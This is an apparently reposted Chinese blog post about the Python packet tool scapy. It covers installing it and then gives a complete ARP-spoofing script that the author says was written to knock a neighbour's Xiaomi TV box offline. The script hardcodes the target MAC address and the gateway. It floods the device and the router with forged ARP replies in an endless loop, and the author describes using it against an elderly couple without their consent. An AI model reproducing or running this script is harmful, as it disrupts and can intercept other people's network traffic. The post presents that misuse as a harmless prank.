学习scapy

2017-03-03 10:01:21来源:http://www.cnblogs.com/5A4A5943/p/6419127.html作者:Python_博客园人点击

不久前才知道scapy这个工具,相见恨晚。其强大在于可以修改数据包,基于python,使用更加方便。


真正开始研究TCP/IP是在半年前,本人不才,拿着FreeRTOS-TCP/IP源码看了个把月,仍然迷茫,好在TCP/IP协议部分明白了很多。


一个月前接触Python,目前正在慢慢熟悉。


Ubuntu14.04安装scapy


由于我的系统已安装Python2.7,但是没有安装pip,这里首先安装pip


1 sudo apt-get install python-pip

如果失败的话可以尝试如下一句


1 sudo apt-get update --fix-missing

pip安装完成之后,安装scapy


sudo pip install scapy

至此,scapy安装完成,如下可以测试以下


vmuser@Linux-host:~/桌面$ python
Python 2.7.3 (default, Oct 26 2016, 21:04:23)
[GCC 4.6.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from scapy.all import *
>>> a = IP()
>>> a
<IP|>
>>> get_if_hwaddr("eth0")
'00:0c:29:70:b1:85'
>>>

eth0是我的网卡。


Python3.6


pip install scapy

或者是


pip3 install scapy-python3

ARP ATTACK EXAMPLE (1)



硬件平台:Dragon Board 410C



系统:Debian



python:2.7


一人在外租房,免不了邻里间相互打扰,近期有房客看电视且声音不小,正好手边有一开发板,计划用scapy发起ARP攻击来使其掉线。


ARP攻击的原理略谈一下,基本就是伪造报文,污染主机或网关的arp缓存表,复杂一些的就要佯装网关,中间攻击。限于本人水平,怎么简单怎么来吧。


首先要知道对方是一个什么样的设备,使用局域网扫描工具,扫描活动主机,然后根据其MAC来定位到底是哪一个MAC地址,扫描结果如下:


C8-3A-35-C0-05-15 Tenda Technology Co., Ltd.
04-E6-76-46-A6-F3 AMPAK Technology, Inc.
78-02-F8-34-4D-B5 私营
24-09-95-95-E2-02 HUAWEI TECHNOLOGIES CO.,LTD
20-47-47-BA-99-1E Dell Inc.
70-14-A6-37-3F-0F Apple, Inc.
E8-B4-C8-7B-F3-0F Samsung Electronics Co.,Ltd
48-3B-38-D9-8D-D8 Apple, Inc.

其中“AMPAK”最可疑,百度一番后,鉴定为小米盒子。(题外话:AMPAK被多次发现做IP扫描。。。。)


锁定MAC之后,我猜他们(一对老夫妇,天天看电视,うるさい!!)是逃不了了


1 #!/usr/bin/env python
2 # _*_ coding=utf-8 _*_
3
4 from scapy.all import *
5 import time
6 import random
7 #-------------------------------------------------------
8 def GetSubNet(OurIP):
9 '''
10 获取子网,192.168.0
11 '''
12 Index = 0
13 SubString = ""
14 while True:
15 num = OurIP.find('.',Index)
16 if num != -1:
17 Index = num + 1
18 if num == -1:
19 SubString = OurIP[:Index]
20 break
21 return SubString
22 #-------------------------------------------------------
23 def GetMac(tgtIP):
24 '''
25 获取目标IP的MAC地址。
26 tgtIP:目标IP地址
27 '''
28 try:
29 tgtMac = getmacbyip(tgtIP)
30 return tgtMac
31 except:
32 print (tgtIP,"请检查目标IP是否存活")
33 #-------------------------------------------------------
34 def GetBrocastIP(OurIP):
35 '''
36 获取局域网广播地址
37 OurIP :我们的IP地址
38 '''
39 return GetSubNet(OurIP) + "255"
40 #-------------------------------------------------------
41 def GetForgetIP(OurIP,Num):
42 '''
43 伪造IP地址
44 OurIP:我们自己的IP
45 Num:要伪造多少个IP地址
46 '''
47 SubString = GetSubNet(OurIP)
48 #伪造IP
49 ForgetIP = []
50 i = 0
51 while i < Num:
52 num = int(random.uniform(0,255))
53 TempIP = SubString + "%d"%num
54 if TempIP == OurIP:
55 continue
56 else:
57 ForgetIP.append(TempIP)
58 i = i + 1
59 return ForgetIP
60 #-------------------------------------------------------
61 def GetForgeMac(OurMac,Num):
62 '''
63 生成随机MAC地址
64 OurMac:我们自己的MAC地址,不能跟自己重复啊
65 '''
66 ForgeMac = []
67 j = 0
68 while j < Num:
69 while True:
70 i = 0
71 TempMac = ""
72 while i < 6:
73 num = int(random.uniform(0,255))
74 TempMac = TempMac + "%02X"%num
75 if i <= 4:TempMac = TempMac + ":"
76 i = i + 1
77 if TempMac == OurMac:
78 pass
79 else:
80 ForgeMac.append(TempMac)
81 j = j + 1
82 break
83 return ForgeMac
84 #-------------------------------------------------------
85 def AttackMac(Mac,face,Num,Interval,GW_IP):
86 '''
87 攻击MAC
88 Mac:要攻击的MAC地址
89 face:发送攻击报文的网络接口
90 GW:是否只攻击网关
91 '''
92 Broadcast_mac = "FF:FF:FF:FF:FF:FF"
93 GW_MAC = ""
94 try:
95 OurIP = get_if_addr(face)
96 if GW_IP != "":GW_MAC = GetMac(GW_IP)
97 except:
98 OurIP = "192.168.0.105"
99 return
100 Broadcast_ip = GetBrocastIP(OurIP)
101 while True:
102 ForgeIP = GetForgetIP(OurIP,Num)
103 #生成数据包
104 if GW_IP != "":
105 #攻击网关
106 pkt = Ether(dst = GW_MAC,src = Mac)//
107 ARP(psrc = ForgeIP,pdst = GW_IP,/
108 hwsrc = Mac,hwdst = GW_MAC,op = 2)
109 else:
110 #攻击全网
111 pkt = Ether(dst = Broadcast_mac,src = Mac)//
112 ARP(psrc = ForgeIP,pdst = Broadcast_ip,/
113 hwsrc = Mac,op = 1)
114 #发送数据包
115 try:
116 #print(ls(pkt))
117 #input()
118 sendp(pkt,iface = face)
119 except:
120 print("!!Send Error!!")
121 break
122 time.sleep(float(Interval))
123 #-------------------------------------------------------
124 def AttackIP(tgtIP,face,Num,Interval,GW_IP):
125 '''
126 攻击IP地址
127 tgtIP:目标IP
128 face:网卡接口
129 Num:攻击报文数目
130 Interval:攻击间隔
131 '''
132 #广播地址
133 GW_MAC = ""
134 Broadcast_mac = "FF:FF:FF:FF:FF:FF"
135 #本地
136 try:
137 OurMac = get_if_hwaddr(face)
138 OurIP = get_if_addr(face)
139 if GW_IP != "":GW_MAC = GetMac(GW_IP)
140 except:
141 OurMac = "00:00:00:00:00:00"
142 OurIP = "192.168.0.105"
143 Broadcast_ip = GetBrocastIP(OurIP)
144 while True:
145 #准备数据包
146 ForgeMac = GetForgeMac(OurMac,Num)
147 if GW_IP != "":
148 #攻击网关
149 pkt = Ether(dst = GW_MAC,src = ForgeMac)//
150 ARP(psrc = tgtIP,pdst = GW_IP,/
151 hwsrc = ForgeMac,hwdst = GW_MAC,op = 2)
152 else:
153 #攻击全网
154 pkt = Ether(dst = Broadcast_mac,src = ForgeMac)//
155 ARP(psrc = tgtIP,pdst = Broadcast_ip,/
156 hwsrc = ForgeMac,op = 1)
157 #发送数据包
158 try:
159 sendp(pkt,iface = face)
160 except:
161 print("!!Send Error!!")
162 break
163 #延迟
164 time.sleep(float(Interval))
165 #-------------------------------------------------------
166 Table = {}
167 def Scanf(OurIP,Start,End):
168 '''
169 扫描网络,获取IP-MAC并保存
170 OurIP:我们的IP地址
171 Start:扫描起始地址
172 End:扫描结束地址
173 例如:OurIP = 192.168.0.105,Start = 99,End = 150
174 扫描IP范围:192.168.0.99 ~ 192.168.0.150
175 '''
176 SubString = GetSubNet(OurIP)
177 for num in range(Start,End):
178 ip = SubString+str(num)
179 arpPkt = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip, hwdst="ff:ff:ff:ff:ff:ff")
180 res = srp1(arpPkt, timeout = 1, verbose=0)
181 if res:
182 Table[res.psrc] = res.hwsrc
183 return Table
184 #-------------------------------------------------------
185 def GetIpByMac(Mac):
186 if len(Table) == 0:return None
187 return Table.get(Mac)
188
189 def Attack_xiaomi(Face,PackNum,Counter,Interval):
190 '''
191 攻击小米盒子
192 Face:网卡接口
193 PackNum:数据包数目
194 Counter:攻击次数(-1:无限次)
195 Interval:攻击间隔
196 例如:Face="wlan0",PackNum=10,Counter=-1,Interval=1
197 '''
198 MY_ip = get_if_addr(Face)
199 MY_mac = get_if_hwaddr(Face)
200 if MY_ip == None or MY_mac == None:return
201
202 GW_ip = "192.168.0.1"
203 GW_mac = GetMac(GW_ip)
204 if GW_mac == None:return
205
206 Scanf(MY_ip,99,150)
207
208 XM_mac = "04:E6:76:46:A6:F3"
209 XM_ip = GetIpByMac(XM_mac)
210 if XM_ip == None:return
211
212 while True:
213 #Attack packs
214 Temp_mac = GetForgeMac(MY_mac,PackNum)
215 Temp_ip = GetForgetIP(MY_ip,PackNum)
216
217 PKT_2_XM_4_mac = Ether(src = GW_mac,dst = XM_mac)/ARP(psrc = Temp_ip,pdst = XM_ip,op = 2)
218 PKT_2_XM_4_ip = Ether(src = Temp_mac,dst = XM_mac)/ARP(psrc = GW_ip,pdst = XM_ip,op = 2)
219 PKT_2_GW_4_XM_mac = Ether(src = XM_mac,dst = GW_mac)/ARP(psrc = Temp_ip,pdst = GW_ip,op = 2)
220 PKT_2_GW_4_XM_ip = Ether(src = Temp_mac,dst = GW_mac)/ARP(psrc = XM_ip,pdst = GW_ip,op = 2)
221 try:
222 sendp(PKT_2_XM_4_mac,iface = Face)
223 time.sleep(0.5)
224 sendp(PKT_2_XM_4_ip,iface = Face)
225 time.sleep(0.5)
226 sendp(PKT_2_GW_4_XM_mac,iface = Face)
227 time.sleep(0.5)
228 sendp(PKT_2_GW_4_XM_ip,iface = Face)
229 except:
230 print("!!Send Error!!")
231 #sleep
232 num = int(random.uniform(0,Interval))
233 time.sleep(num)
234 if Counter == -1:
235 pass
236 else:
237 Counter = Counter - 1
238 if Counter == 0:
239 return
240
241 if __name__ == "__main__":
242 #while True:
243 #AttackIP("192.168.0.108","wlan0",10,60,"192.168.0.1")
244 #AttackMac(Mac,face,Num,Interval,GW_IP):
245 #AttackMac("C8:3A:35:C0:05:15","wlan0",2,2,"192.168.0.108")
246 while True:
247 Attack_xiaomi("wlan0",20,30,5)

最新文章

123

最新摄影

闪念基因

微信扫一扫

第七城市微信公众平台